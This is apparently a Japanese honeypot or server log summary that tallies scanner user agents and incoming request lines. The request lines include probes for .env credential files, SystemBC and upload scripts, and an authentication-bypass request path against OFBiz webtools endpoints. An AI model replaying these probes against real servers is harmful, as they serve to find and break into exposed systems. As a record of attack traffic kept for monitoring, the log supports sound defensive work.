1 Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
18 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
9 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
1 curl/8.1.2
1 page-preview-tool Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_13.67.44.234_80
1 \x03
1 \x16\x03\x01\x01H\x01
20 \x16\x03\x01
3 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT httpbin[.]org:443 HTTP/1.1
18 GET /.env HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /ReportServer HTTP/1.1
2 GET /Temporary_Listen_Addresses HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /bundle.js HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /druid/index.html HTTP/1.1
1 GET /f5Zr8cQlknADmaP3t4zICS2hwyc HTTP/1.1
7 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /form.html HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /h5/static/img/banner-1.5329368.png HTTP/1.1
1 GET /hudson HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /password.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /systembc/password.php HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /upl.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 POST /webtools/control/ProgramExport;/?USERNAME&PASSWORD&requirePasswordChange=Y HTTP/1.1
1 POST /webtools/control/SOAPService HTTP/1.1
1 POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
1 POST /webtools/control/xmlrpc HTTP/1.1
3 PRI * HTTP/2.0